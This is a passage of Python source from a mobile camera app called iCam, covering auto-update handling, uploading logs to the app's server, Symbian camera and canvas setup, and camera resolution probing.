                        sys.exc_info()
                    myText = "Exception in AutoUpdate() when downloading " \
                             "file. Details: time = %s, free_ram = %d. %s." \
                             % (GetCurrentDateTimeStringNice(),
                                GetFreeRAM(),
                                repr(traceback.format_tb(exceptionTraceback)))
                    if MY_DEBUG_UPLOAD_MSG:
                        UploadGZippedData(deviceId, myText,
                            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
                    DebugPrint(myText)
                    if MY_DEBUG_STDERR:
                        # traceback.print_exc()
                        sys.stderr.write(myText + "\n")
                        sys.stderr.flush()
                    return
                try:
                    myText = "AutoUpdate(): len(dataUpdate) = %d." \
                        % len(dataUpdate)
                    DebugPrint(myText)
                    if MY_DEBUG_UPLOAD_MSG:
                        UploadGZippedData(deviceId, myText,
                            ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
                    # "PK" is the ZIP magic number.
                    if (len(dataUpdate) > 2) and (dataUpdate[0] == "P") and \
                            (dataUpdate[1] == "K"):
                        # To avoid getting an invalid ZIP file we check only
                        # the magic number from the header (e.g., an ad from
                        # 110mb.com :) ) - in fact this might not be good
                        # enough.
                        """
                        if len(dataUpdate) == \
                                os.path.getsize(TARGET_UPDATE_PATH_FILENAME):
                            myText = "AutoUpdate(): The installed version " \
                                "of iCam seems to be the most recent one."
                            if MY_DEBUG_UPLOAD_MSG:
                                UploadGZippedData(deviceId, myText,
                                    ICAM_SERVER_NAME,
                                    WEBPAGE_UL_GZIPPED_TEXT, None)
                            DebugPrint(myText)
                            return
                        """
                        #fOutput = open(LOCAL_FOLDER + "/FilesFromServer/" +
                        #    fileName, "wb")
                        fOutput = open(UPDATE_FROM_INTERNET_PATH_FILENAME,"wb")
                        fOutput.write(dataUpdate)
                        fOutput.close()
                        ApplyUpdate(UPDATE_FROM_INTERNET_PATH_FILENAME,
                                    TARGET_UPDATE_PATH_FILENAME,
                                    TARGET_UPDATE_PATH_FILENAME_BACKUP)
                    else:
                        myText = "AutoUpdate(): What we downloaded does not " \
                                 "seem to be an update for iCam."
                        DebugPrint(myText)
                        if MY_DEBUG_UPLOAD_MSG:
                            UploadGZippedData(deviceId, myText,
                                ICAM_SERVER_NAME,
                                WEBPAGE_UL_GZIPPED_TEXT, None)
                except:
                    DebugPrintErrorTrace()
            """
            EasyUpdate (that is the program autoupdates by copying
            UPDATE_FILENAME if it exists as the new iCam default.py
            script - it is the only way to replace the script, since only
            the program can rewrite its file, otherwise if I want another
            program to do the update I need to have AllFiles capabilities).
            try:
                UPDATE_FILENAME = "E:/iCam.py"
                if os.path.exists(UPDATE_FILENAME):
                    appuifw.note(unicode("Found update. Copying it."), "info")
                    print "Found update. Copying it."
                    sys.stdout.flush()
                    CopyFile(UPDATE_FILENAME, "E:/private/e21e55ef/default.py")
                    os.unlink(UPDATE_FILENAME)
            except:
                exceptionType, exceptionValue, exceptionTraceback = \
                    sys.exc_info()
                appuifw.note(unicode(repr(
                    traceback.format_tb(exceptionTraceback))), "info")
                traceback.print_exc()
                sys.stdout.flush()
                sys.stderr.flush()
            """
        elif WINDOWS_CE_OS_PYTHONCE:
            pass
    except:
        DebugPrintErrorTrace()
def AutoUpdate():
    """Look for a newer iCam build and install it if one is found.

    Checks both the local Update folder on disk and the Internet; what
    the update looks like depends on the smartphone OS and its version.

    Deliberately runs on the calling (main) thread: AutoUpdate_real()
    briefly shows UI elements, which need to run in the main thread, so
    spawning a worker thread here (thread.start_new_thread /
    MyThreadStart) would be a bad idea.
    """
    AutoUpdate_real()
def UploadUnsentLogs():
    """Upload pending stdout/stderr log files to the iCam server.

    First calls DownloadCommands() (its result is currently unused),
    then walks LOCAL_FOLDER and uploads every file whose name contains
    the stdout/stderr prefixes and is smaller than 10 MB -- skipping the
    two log files currently open for this run.  Uploaded files are then
    moved to LOCAL_FOLDER_SENT_LOGS so they are not sent again, except
    the *Watchdog.txt pair, which stays in place.  Errors are logged
    and swallowed.
    """
    global LOCAL_FOLDER, MY_DEBUG_STDOUT
    global STDERR_FILENAME_PREFIX, STDOUT_FILENAME_PREFIX
    global stdoutFileName, stderrFileName
    global uploadUnsentData
    hasDownloadedNewCmd = DownloadCommands()
    """
    DebugPrint("Entered UploadUnsentLogs(): uploadUnsentData = %d." % \
        uploadUnsentData)
    """
    DebugPrint("Entered UploadUnsentLogs().")
    """
    if conserveEnergy or ((uploadUnsentData != 2) and (uploadUnsentData != 3)):
        return
    """
    try:
        if not os.path.exists(LOCAL_FOLDER_SENT_LOGS):
            os.makedirs(LOCAL_FOLDER_SENT_LOGS)
    except:
        DebugPrintErrorTrace()
    try:
        pathFolderName = LOCAL_FOLDER
        folderContent = os.listdir(pathFolderName)
        """
        Use reverse = False to send first the oldest ones (like this you send
        in chronological order). Use reverse = True for sending first the
        most recent ones.
        """
        # sortedFolderContent = sorted(folderContent, reverse = False)
        # sort() without parameters is the ONLY one that works in Python 2.2.
        # (Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
        folderContent.sort()
        sortedFolderContent = folderContent
        DebugPrint("UploadUnsentLogs(): sortedFolderContent = %s." % \
            sortedFolderContent)
        for fileName in sortedFolderContent:
            if (fileName.find(STDERR_FILENAME_PREFIX) != -1) or \
                    (fileName.find(STDOUT_FILENAME_PREFIX) != -1):
                # Since we can't move currently open files we do not process
                # them now.
                if fileName == stdoutFileName or fileName == stderrFileName:
                    pass
                else:
                    pathFileName = pathFolderName + "/" + fileName
                    # if os.path.isdir(pathFileName):
                    if os.path.isfile(pathFileName):
                        fileSize = os.path.getsize(pathFileName)
                        # Cap uploads at 10 MB per log file.
                        if fileSize < 10 * MEGA_BYTE:
                            myText = "UploadUnsentLogs(): sending log file %s "\
                                     "of %d bytes at %s." \
                                     % (fileName, fileSize,
                                        GetCurrentDateTimeStringNice())
                            DebugPrint(myText)
                            if MY_DEBUG_UPLOAD_MSG:
                                UploadGZippedData(deviceId, myText,
                                    ICAM_SERVER_NAME,
                                    WEBPAGE_UL_GZIPPED_TEXT, None)
                            """
                            if UploadFile(pathFileName, ICAM_SERVER_NAME,
                                    WEBPAGE_UL_GZIPPED_FILE) != -1:
                                # We do not move stdout/stderr_Watchdog.txt
                                # files because we want to keep them together
                                # for the whole run. But we move
                                # stdout/stderr_Watchdog_*.txt
                                if (fileName.find("Watchdog.txt") == -1):
                                    MoveFileBetweenAnyDrives(pathFileName,
                                        LOCAL_FOLDER_SENT_LOGS + "/" + \
                                        fileName)
                            """
                            UploadFile(pathFileName, ICAM_SERVER_NAME,
                                WEBPAGE_UL_GZIPPED_FILE)
                            """
                            We do not move stdout/stderr_Watchdog.txt files
                            because we want to keep them together for the
                            whole run. But we move stdout/stderr_Watchdog_*.txt
                            """
                            if fileName.find("Watchdog.txt") == -1:
                                MoveFileBetweenAnyDrives(pathFileName,
                                    LOCAL_FOLDER_SENT_LOGS + "/" + fileName)
    except:
        # break
        DebugPrintErrorTrace()
def GeneralUseCameraTest(cameraId):
    """Ad-hoc hardware experiment for the camera API.

    Scratch/test code, not part of the normal flow: opens camera 0 via
    the private camera._camera API, starts the view finder, records a
    5-second clip to E:\\my_vid_camera.mp4, then (on S60) blocks on
    appLock until Quit() releases it.  Most of the body is deliberately
    commented-out experiments kept for reference; note the cameraId
    parameter is currently unused.
    """
    def MyVideoRecordCallback(errorCode, eventType):
        # Video-recording events are ignored in this test.
        pass
    #"""
    # Not using this line --> gave error in camera2.py line 270
    # saying NoneType
    camera._my_camera = camera._camera.Camera(0)
    # After this command the phone restarts.
    #camera.start_finder(ViewFinderCallback, True, viewFinderSize)
    #"""
    """
    DebugPrint("Before camera._camera.Camera(1)")
    camera._my_camera = camera._camera.Camera(1)
    DebugPrint("After camera._camera.Camera(1)")
    camera.device[1] = camera._my_camera
    # The thread crashes here - it says:
    # "Application closed: InFrameProcThread."
    pic = camera.take_photo("RGB", (320, 240), 0, "none", "auto",
        "auto", 1)
    """
    """
    camera.device[0] = camera._my_camera
    # The thread crashes here - it says:
    # "Application closed: OutFrameProcThread.
    pic = camera.take_photo("RGB", (640, 480), 0, "none", "auto",
        "auto", 0)
    """
    # Save the photo (as JPEG) with maximum quality (100%) locally.
    #pic.save(r"E:\RGB.jpg", None, None, 100)
    # """
    # After this command the phone restarts when camera is 1.
    camera.start_finder(ViewFinderCallback, True, viewFinderSize)
    DebugPrint("After camera.start_finder()")
    """
    # Seems not to work:
    #camera.start_record(r"E:\my_vid_2.mp4", MyVideoRecordCallback,
    #    format = "EFormatYUV420Planar", frameSize = (320, 240),
    #    frameRate = 0.0,
    #    videoType = "video/mp4v-es; profile-level-id=4",
    #    audioEnabled = True)
    #camera.start_record(r"E:\my_vid_2.mp4", MyVideoRecordCallback,
    #    format = "EFormatYUV420Planar", frameSize = (176, 144),
    #    frameRate = 30.0, videoType = "", audioEnabled = True)
    """
    # No video with camera2.
    camera.start_record(r"E:\my_vid_camera.mp4", MyVideoRecordCallback)
    e32.ao_sleep(5.0)
    camera.stop_record()
    # """
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        # The application waits for the signal from Quit(), in
        # order to exit.
        appLock.wait()
def GeneralUseCameraG810():
    """
    Samsung SGH-G810 specific camera bring-up.

    Opens camera 0 directly (bypassing camera.UseCamera(), which gave a
    NoneType error in camera2.py on this model), starts the view finder and
    records a 7-second test clip.  The quoted start_record() variants are
    parameter combinations that did not work on this device.
    """
    # Not using this line --> gave error in camera2.py line 270
    # saying NoneType.
    camera._my_camera = camera._camera.Camera(0)
    camera.device[0] = camera._my_camera
    DebugPrint("After opening camera on SamsungSGH-G810.")
    #DebugPrint("Before camera.start_finder()")
    def MyVideoRecordCallback(errorCode, eventType):
        # Video-record completion/progress callback; results ignored here.
        pass
    # After this command the phone restarts when camera is 1.
    camera.start_finder(ViewFinderCallback, True, viewFinderSize)
    """
    # Seems not to work at all:
    #camera.start_record(r"E:\my_vid_2_new.mp4",
    #    MyVideoRecordCallback, format = "EFormatYUV420Planar",
    #    frameSize = (320, 240), frameRate = 0.0,
    #    videoType = "video/mp4v-es; profile-level-id=4",
    #    audioEnabled = True)
    # Seems not to work:
    #camera.start_record(r"E:\my_vid_EFormatYUV422.mp4",
    #    MyVideoRecordCallback, format = "EFormatYUV422",
    #    frameSize = (320, 240), frameRate = 15.0,
    #    videoType = "video/mp4v-es; profile-level-id=4",
    #    audioEnabled = True)
    # Testing without success video record on G810:
    # Seems not to work:
    #camera.start_record(r"E:\my_vid_3.mp4", MyVideoRecordCallback,
    #    format = "EFormatYUV420Planar", frameSize = (320, 240),
    #    frameRate = 30.0,
    #    videoType = "video/mp4v-es; profile-level-id=4",
    #    audioEnabled = True)
    """
    camera.start_record(
        r"E:\my_vid_3.mp4",
        MyVideoRecordCallback,
        format="EFormatYUV420Planar",
        frameSize=(320, 240),
        frameRate=0.0,
        videoType="video/mp4v-es; profile-level-id=4",
        audioEnabled=True
    )
    # Record for 7 seconds, then stop.
    e32.ao_sleep(7.0)
    camera.stop_record()
    DebugPrint("After camera.stop_record().")
    #DebugPrint("Before camera.start_finder()")
def GeneralUseCameraS60(cameraId):
    """
    Select/open the camera with index `cameraId` on a Symbian device.

    Dispatches to the right opening strategy: the Samsung G810 gets its
    dedicated bring-up routine; with the camera2 module imported we go
    through camera.UseCamera(); otherwise the plain camera module is
    released and the device is bound directly.  All failures are logged
    and swallowed.  No-op on non-Symbian platforms.
    """
    if not SYMBIAN_OS:
        return
    try:
        if False:
            # Disabled experimental path, kept for manual testing.
            GeneralUseCameraTest(cameraId)
        if phoneModel == "SamsungSGH-G810":
            # Samsung G810 specific: !!!!
            GeneralUseCameraG810()
        elif camera2IsImported:
            camera.UseCamera(cameraId)
        else:
            # When using camera2, release() doesn't do anything - on
            # camera2 we have to explicitly choose a camera.  Here we are
            # on the plain camera module, so release whatever is held and
            # bind the requested device directly.
            try:
                camera.release()
            except:
                DebugPrintErrorTrace()
            camera._my_camera = camera._camera.Camera(cameraId)
    except:
        DebugPrintErrorTrace()
# Symbian UI state shared between SetupSymbian() and the canvas callbacks.
canvas = None                 # appuifw.Canvas created in SetupSymbian()
redrawHandlerRunning = None   # re-entrancy guard used by RedrawHandler()
myImg = None                  # off-screen image blitted by RedrawHandler()
appLock = None                # e32.Ao_lock the app waits on until Quit()
def RedrawHandler(rect):
    """
    Canvas redraw callback: blits the cached off-screen image (if any),
    clears the screen unless doNotDisplayRedrawInfo is set, then redraws
    the status info once the application state has been loaded.

    rect: the dirty rectangle reported by the Canvas (only logged here).
    """
    global canvas, myImg
    global stateLoaded
    global redrawHandlerRunning
    global doNotDisplayRedrawInfo
    # When inside RedrawHandler() (actually DisplayRedrawInfo()) another
    # instance of RedrawHandler() can be called, which messes things up and
    # crashes iCam - so re-entrant calls are simply dropped.
    if redrawHandlerRunning == True:
        return
    redrawHandlerRunning = True
    try:
        DebugPrint("Entered RedrawHandler(): rect = %s" % str(rect))
        # Not calling canvas.begin_redraw()/end_redraw() here: begin_redraw()
        # triggers HandleRedraw() again (indirect recursion), which probably
        # crashed iCam.
        try:
            if myImg:
                canvas.blit(myImg)
            if doNotDisplayRedrawInfo == True:
                DebugPrint("RedrawHandler(): not calling ClearScreen() " \
                    "because doNotDisplayRedrawInfo == True.")
            else:
                ClearScreen()
        except:
            DebugPrintErrorTrace()
        if stateLoaded:
            DisplayRedrawInfo()
    finally:
        # BUG FIX: reset the guard even if DisplayRedrawInfo() raises.
        # Previously this assignment was only reached on the normal path,
        # so an escaping exception left the flag True forever and silently
        # disabled all further redraws.
        redrawHandlerRunning = False
def ResizeHandler(newSize):
    """Canvas resize callback: currently only logs the new canvas size."""
    message = "Entered ResizeHandler(): newSize = %s" % str(newSize)
    DebugPrint(message)
#displaySize
# Smallest/largest screen dimension in pixels; -1 until SetupSymbian()
# fills them in from sysinfo.display_pixels() (or a (100, 100) fallback).
displaySizeMin = -1
displaySizeMax = -1
def SetupSymbian():
    """
    One-time Symbian UI bring-up.

    Sets the application title, disables the directional pad on Symbian^3,
    reads the display size, creates the Canvas wired to RedrawHandler /
    keyboard / ResizeHandler, installs the exit-key handler and the normal
    screen mode, and creates the Ao_lock the app later waits on.  Finally,
    when the miso module is available, reads the local Bluetooth address
    and name.

    Fills in the module globals: canvas, redrawHandlerRunning, myImg (left
    untouched here), appLock, displaySizeMin/displaySizeMax,
    bluetoothSelfAddress/bluetoothSelfName.  All errors are logged and
    swallowed so startup continues.  The many quoted blocks are preserved
    alternative experiments from earlier PyS60 versions.
    """
    #global keyboard
    global canvas, redrawHandlerRunning, myImg, appLock
    #global displaySize
    global displaySizeMin, displaySizeMax
    global bluetoothSelfAddress, bluetoothSelfName
    DebugPrint("Entered SetupSymbian()\n" + \
        "S60_EDITION=%s, SYMBIAN_OS=%d, SYMBIAN_S60_OS=%d, " \
        "SYMBIAN_S60_2ND_ED=%d, SYMBIAN_S60_3RD_ED=%d, SYMBIAN_1=%d, " \
        "SYMBIAN_3=%d, SYMBIAN_UIQ_OS=%d" % (str(S60_EDITION), SYMBIAN_OS, \
        SYMBIAN_S60_OS, SYMBIAN_S60_2ND_ED, SYMBIAN_S60_3RD_ED, \
        SYMBIAN_1, SYMBIAN_3, SYMBIAN_UIQ_OS))
    try:
        keyboard = Keyboard()
        DebugPrint("SetupSymbian(): keyboard = %s" % str(keyboard))
        # appuifw.app.orientation = "landscape"
        # appuifw.app.menu = None - gives error
        """
        if SYMBIAN_S60_3RD_ED and (not _PyS60_1_9_OR_NEWER):
            pass
        else:
            appuifw.app.title = ICAM_APP_TITLE
        """
        appuifw.app.title = ICAM_APP_TITLE
        """
        appuifw.app.body - From PyS60 2.0 manual:
        "The UI control that is visible in the application's main window.
        Currently either Text, a Listbox object, Canvas, or None".
        """
        """
        t = appuifw.Listbox()
        appuifw.app.body = t
        """
        """
        # From http://croozeus.com/blogs/?p=215:
        #"Text is a text editor UI control that allows text with various formatting
        # to be displayed."
        #t = appuifw.Text()
        # Set the color of the text:
        t.color = 0xFF0000
        # Set the font by name, size and flags:
        #t.font = (u"Nokia Hindi S60", 25, None)
        # Set the color in which the text will be highlighted:
        #t.highlight_color = 0xFFFF00
        # Highlight the text in a normal way and set the style of the text to
        # underlined:
        #t.style = (appuifw.HIGHLIGHT_STANDARD | appuifw.STYLE_UNDERLINE)
        # Write text to see the effect:
        t.add(u"This is an example")
        """
        """
        while True:
            e32.ao_sleep(1.0)
        """
        if SYMBIAN_3:
            """
            For Symbian^3 devices we disable the directional_pad - it seems it is
            not supported, and it will MAKE THE CANVAS SMALLER WITHOUT
            DISPLAYING ANYTHING if we enable it.
            From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/07._Graphics_and_Multimedia#Displaying_and_Handling_Image_Objects:
            For these, you can use the canvas to display a virtual directional
            pad (if the application is in full screen mode, the directional
            pad is accompanied by two virtual softkeys, as shown in
            Figure 7.1).
            The pad can be enabled or disabled by setting
            appuifw.app.directional_pad to True or False, respectively.
            From http://discussion.forum.nokia.com/forum/showthread.php?203133-How-to-get-rid-of-virtual-buttons-and-softkey-labels-on-X6 :
            "Have you tried setting appuifw.app.directional_pad = False ?
            Do that after setting the screen to 'full' ('full_max' is no longer
            used in more recent versions of PyS60, I think it was only
            available in 1.9.4) and before setting the app's body to Canvas and
            it should work."
            """
            appuifw.app.directional_pad = False
        """
        To change the softkey labels see:
        http://discussion.forum.nokia.com/forum/showthread.php?166614-English-softkey-labels
        http://discussion.forum.nokia.com/forum/showthread.php?78957-announce-uikludges-enable-right-sofkey-label-modification
        http://discussion.forum.nokia.com/forum/showthread.php?89557-Controlling-quot-menu-quot-and-quot-exit-quot-labels-in-the-UI
        http://wiki.forum.nokia.com/index.php/Softkey_labels
        """
        redrawHandlerRunning = False
        # if SYMBIAN_OS:
        if SYMBIAN_S60_OS:
            displaySize = sysinfo.display_pixels()
        else:
            # Non-S60 fallback size, used only so the min/max logic below works.
            displaySize = (100, 100)
        DebugPrint("SetupSymbian(): displaySize = %s." % (str(displaySize)))
        # Normalize the two screen dimensions into min/max regardless of the
        # current orientation.
        displaySizeMin = displaySize[0]
        displaySizeMax = displaySize[1]
        if displaySizeMax < displaySizeMin:
            displaySizeMin = displaySize[1]
            displaySizeMax = displaySize[0]
        # if SYMBIAN_OS:
        if SYMBIAN_S60_OS:
            """
            myImg = graphics.Image.new(displaySize)
            myImg.rectangle((0, 0, displaySizeMax - 1, displaySizeMax - 1), fill=0)
            # , width = 20)
            """
            # myImg = graphics.Image.open(r"E:\private\e21e55ef\wallpaper.jpg")
            canvas = appuifw.Canvas(RedrawHandler, keyboard.HandleEvent,
                ResizeHandler)
            # """
            # Create an image the size of the screen
            # appuifw.app.body.begin_redraw() # AttributeError: begin_redraw()
            # myImg = graphics.Image.new(sysinfo.display_pixels())
            """
            myImg = graphics.Image.new((360, 640))
            myImg.rectangle((0, 0, 359, 639), fill=0x00FF00, width=20)
            """
            # appuifw.app.body.end_redraw()
            # Make the background a canvas; needed for key capturing
            # Canvas([redraw_callback=None, event_callback=None,
            # resize_callback=None ])
            # canvas = appuifw.Canvas( None, keyboard.HandleEvent)
            appuifw.app.body = canvas
            """
            # Test if application is in foreground or background - from
            # http://discussion.forum.nokia.com/forum/showthread.php?214083-appswitch-module.
            import appuifw
            def cb(fg):
                if(fg):
                    print "foreground"
                else:
                    print "background"
            appuifw.app.focus=cb
            """
            """
            try:
                # 'Canvas' object has no attribute 'resize' .
                canvas.resize((360, 640))
            except:
                DebugPrintErrorTrace()
            """
            appLock = e32.Ao_lock()
            # myTimer = e32.Ao_timer()
            DebugPrint("canvas.size = %s" % str(canvas.size))
            """
            DebugPrint("Before appuifw.app.exit_key_handler: " \
                "canvas.size = %s" % str(canvas.size))
            """
            appuifw.app.exit_key_handler = ConfirmQuit # Quit
            """
            N82, N95, etc
            240 x 320 pixels
            E7, N8
            360 x 640 pixels
            canvas.size = (360, 480)
            """
            """
            DebugPrint("Before calling appuifw.app.screen: " \
                "canvas.size = %s" % str(canvas.size))
            """
            # Normal screen with title pane and softkey labels
            appuifw.app.screen = "normal"
            # Only softkey labels visible.
            # appuifw.app.screen = "large"
            # It uses for Canvas the entire screen - no menu appears.
            # (full screen mode on all devices).
            # appuifw.app.screen = "full"
            """
            DebugPrint("canvas.size = %s\n" % str(canvas.size) + \
                "sysinfo.display_pixels() = %s" % str(sysinfo.display_pixels()))
            """
            """
            canvas.size = (360, 640) # AttributeError: can't set attribute
            DebugPrint("canvas.size = %s" % str(canvas.size))
            """
            """
            # From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/08._Touch_User_Interface#Detecting_a_touch_event_within_a_rectangle:
            def BlueDown(event):
                ''' Blue DOWN event handler '''
                appuifw.note(u"Blue Down")
            import key_codes
            appuifw.app.body.begin_redraw()
            canvas.bind(key_codes.EButton1Down, BlueDown, ((0, 0), (359, 639)))
            appuifw.app.body.end_redraw()
            """
            """
            appuifw.app.body.begin_redraw()
            canvas.rectangle(((0, 0), (359, 639)), fill=(0, 0, 255), width=5)
            appuifw.app.body.end_redraw()
            """
            #canvas.text((100, 100), u"DOWN", fill=(0, 0, 0),
            # font=(u'Nokia Hindi S60', 40, appuifw.STYLE_BOLD))
    except:
        DebugPrintErrorTrace()
    if misoIsImported:
        # Best-effort reads of the local Bluetooth identity; each may fail
        # independently (e.g. Bluetooth turned off), hence separate try blocks.
        try:
            bluetoothSelfAddress = miso.local_bt_address()
        except:
            DebugPrint("MainSetUI(): miso.local_bt_address() returned exception.")
            DebugPrintErrorTrace()
        try:
            """
            It gives a "KErrHardwareNotAvailable" exception if the
            Bluetooth is not on (or maybe even when it is not set
            up - no name and probably never activated).
            """
            bluetoothSelfName = miso.local_bt_name()
        except:
            DebugPrint("MainSetUI(): miso.local_bt_name() returned exception.")
            DebugPrintErrorTrace()
    DebugPrint("Exiting SetupSymbian().")
#!!!!TODO: Put code in LoadMDExtensionScript() in global space - see comments below!!!!
def LoadMDExtensionScript():
    """
    Load the optional motion-detection extension script (iCam_MD.py) from
    LOCAL_FOLDER, if it exists, so it can redefine functions/variables of
    this module (e.g. numHotspots).  Missing file is not an error; any
    failure while executing the script is logged and swallowed.

    From http://docs.python.org/library/functions.html#execfile:
    "execfile() cannot be used reliably to modify a function's locals" -
    the default locals dictionary should not be modified.
    """
    EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME = "iCam_MD.py"
    EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME = LOCAL_FOLDER + "/" + \
        EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME
    try:
        # if os.path.exists(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME):
        if os.path.isfile(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME):
            DebugPrint("LoadMDExtensionScript(): Found %s. Loading it." % \
                EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME)
            # BUG FIX (was the TODO above this function): execute the script
            # in the module's global namespace instead of this function's
            # locals.  With the old bare execfile(path) the script's
            # definitions landed in the (unreliable) local dict, the
            # module-level redefinitions never took effect, and the
            # numHotspots lookup below raised NameError.
            execfile(EXTENSION_MOTION_DETECTION_SCRIPT_PATH_FILENAME,
                globals())
            DebugPrint("LoadMDExtensionScript(): " \
                "numHotspots = %d." % numHotspots)
    except:
        DebugPrint("LoadMDExtensionScript(): execfile(%s) returned " \
            "exception." % EXTENSION_MOTION_DETECTION_SCRIPT_FILENAME)
        DebugPrintErrorTrace()
# For PyObjC
# iOS-only object handles; stay None on every other platform.
testBedViewControllerInstance = None
NSTimer = None
UIApplicationInstance = None
UIImagePickerControllerInstance = None
UIImagePickerControllerSourceTypeCamera = None
# Human-readable OS name ("Android", "Symbian", "iOS", ...), set in Main().
OSName = None
def MainSetUI():
    """
    Per-OS UI initialisation.

    Chooses orientationForThisPhoneModel (from a per-model table on
    Symbian S60, "portrait" elsewhere), applies the orientation on S60 via
    SetUIOrientation() and shows a welcome note, and on the other
    platforms builds the menu via SetMenu().  Errors are logged and
    swallowed so startup continues.
    """
    global orientationForThisPhoneModel
    if ANDROID_OS:
        try:
            DisplayRedrawInfo()
        except:
            """
            DebugPrint("MainSetUI(): Could not check existence/create %s." % \
                HTML_PATHFILENAME)
            """
            DebugPrintErrorTrace()
        if False:
            TestPhoneCall()
        orientationForThisPhoneModel = "portrait"
        SetMenu(True)
    elif SYMBIAN_S60_OS:
        # elif SYMBIAN_OS:
        # audio.say(u"I can't get no satisfaction")
        try:
            # Models whose main camera shoots in landscape.
            if phoneModel in ["Nokia6120", "Nokia5800", "Nokia5230", "Nokia5530", \
                "NokiaC5", \
                "NokiaN95", "NokiaN97mini", "NokiaN82", \
                "NokiaN8", "NokiaE7", "NokiaC5-03", "NokiaC6", "NokiaC7", \
                "NokiaX6"]:
                orientationForThisPhoneModel = "landscape"
            elif phoneModel in ["Nokia6680", \
                "NokiaN70", \
                "NokiaE50-1", "NokiaE63", "NokiaE65", \
                "NokiaE5", "NokiaE72", "NokiaE75"]:
                orientationForThisPhoneModel = "portrait"
            elif S60_EDITION[0] >= 3:
                # In principle most other 3rd edition phones should be landscape
                orientationForThisPhoneModel = "landscape"
            else:
                orientationForThisPhoneModel = "portrait"
            # We change orientation if necessary to be able to access the biggest
            # resolutions of the main camera.
            SetUIOrientation(0, False)
            #appuifw.note(u"Welcome to iCam! (Returned from SetUIOrientation() " \
            # ":) ).", "info")
            appuifw.note(u"Welcome to iCam!", "info")
            """
            try:
                appuifw.app.body.begin_redraw()
                canvas.text((100, 100), u"Welcome to iCam: state!",
                    fill = (255, 0, 255))
                appuifw.app.body.end_redraw()
            except:
                DebugPrintErrorTrace()
            """
            # To get the right values for cameraPhotoSizes* we need to be in
            # landscape mode.
            #e32.reset_inactivity()
            #e32.ao_sleep(3)
            #e32.ao_sleep(5)
        except:
            DebugPrintErrorTrace()
    elif SYMBIAN_UIQ_OS:
        orientationForThisPhoneModel = "portrait"
        SetMenu(True)
    elif iOS_PYOBJC:
        orientationForThisPhoneModel = "portrait"
        SetMenu(True)
    elif WINDOWS_CE_OS_PYTHONCE:
        orientationForThisPhoneModel = "portrait"
        SetMenu(True)
# We send this text msg to the iCam server a bit later.
# Filled in by SetCameraParamsS60() with the main camera's video
# capability report (formats / frame sizes / frame rates).
myTextMainCamera2Video = ""
def SetCameraParamsS60():
    """
    Probe the Symbian S60 camera capabilities.

    Opens camera 0, queries the number of cameras and the supported photo
    resolutions (JPEG_Exif and RGB) for each camera, and - when the camera2
    module is available and two cameras exist - the supported video formats,
    frame sizes and frame rates.  Finally applies per-model corrections for
    phones that report wrong (portrait-mode) resolution lists.

    Fills in the module globals: numCamerasSupported,
    cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24, cameraVideoFormats,
    cameraVideoFrameSizes, cameraVideoModes, localVideoMode and
    myTextMainCamera2Video.  Must run AFTER the UI orientation is set (see
    the note below) or the reported resolutions can be wrong.
    """
    global myTextMainCamera2Video
    global numCamerasSupported
    global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
    global cameraVideoFormats, cameraVideoFrameSizes, cameraVideoModes
    global localVideoMode
    DebugPrint("Entered SetCameraParamsS60().")
    """
    Required to acquire properly the supported camera resolutions, in case
    I have done import camera before changing the app orientation.
    Otherwise, for landscape mode phones we:
    - will not get the biggest resolutions of the main camera
    - the biggest take_photo(camera = 0) might raise expcetion
    ValueError: "Size not supported for camera".
    (This is so because the initalization with supported camera resolutions
    is partly done only once at the very beginning of the camera
    module, which assumes that app orientation cannot change.
    Note, however, that the best solution would be to add in camera.py a
    function that does all these operations.
    """
    """
    # When using camera2, this doesn't do anything - on camera2 we have to
    # explicitely choose a camera.
    camera.release()
    #camera._my_camera = camera._camera.Camera(0)
    camera.UseCamera(0)
    """
    GeneralUseCameraS60(0)
    """
    camera.device = []
    for dev_index in range(camera.number_of_devices):
        # Used only for image size checking.
        camera.device.append(camera._camera.Camera(dev_index))
    """
    """
    if phoneModel in ["Nokia6120", "NokiaN95", "NokiaN82"]:
        # For phones that take Main camera photos with the Camera App in
        # landscape mode - Switch to landscape mode, before import
        # camera, in order to be able to take_photo() at the highest
        # resolution for the Main camera.
        appuifw.app.orientation = "landscape"
    """
    """
    #import audio
    #audio.Sound.set_volume(0)
    SetUIOrientation(0, True)
    #!!!!I don't know why do I need it.
    #e32.ao_sleep(2) #it was 4 before
    """
    try:
        numCamerasSupported = camera.cameras_available()
    except:
        DebugPrintErrorTrace()
    if phoneModel == "SamsungSGH-G810":
        # The VGA camera doesn't really seem to work at all - it makes the
        # phone restart when giving take_photo?!!!!
        numCamerasSupported = 1
    # numCamerasSupported = 1
    if numCamerasSupported >= 1:
        """
        camera.release()
        #camera._my_camera = camera._camera.Camera(0)
        camera.UseCamera(0)
        """
        # Retrieving the supported resolutions for the Main camera:
        # NOTE(review): both branches below issue the same image_sizes()
        # calls - the split by orientation looks like a leftover; confirm.
        if orientationForThisPhoneModel == "landscape":
            cameraPhotoSizes_JPEG_Exif[0] = camera.image_sizes("JPEG_Exif")
            #print "cameraPhotoSizes_JPEG_Exif = ", cameraPhotoSizes_JPEG_Exif
            cameraPhotoSizes_RGB24[0] = camera.image_sizes("RGB")
        else:
            #print "cameraPhotoSizes_RGB24 = ", cameraPhotoSizes_RGB24
            #cameraPhotoSizes = [(2592, 1944)] + cameraPhotoSizes
            #cameraPhotoSizes_landscape = \
            # cameraPhotoSizes_landscape_JPEG_Exif + \
            # cameraPhotoSizes_landscape_RGB24
            cameraPhotoSizes_JPEG_Exif[0] = camera.image_sizes("JPEG_Exif")
            cameraPhotoSizes_RGB24[0] = camera.image_sizes("RGB")
        """
        if MY_DEBUG_STDOUT:
            print "camera.image_sizes(RGB16) = %s" % \
                str(camera.image_sizes("RGB16"))
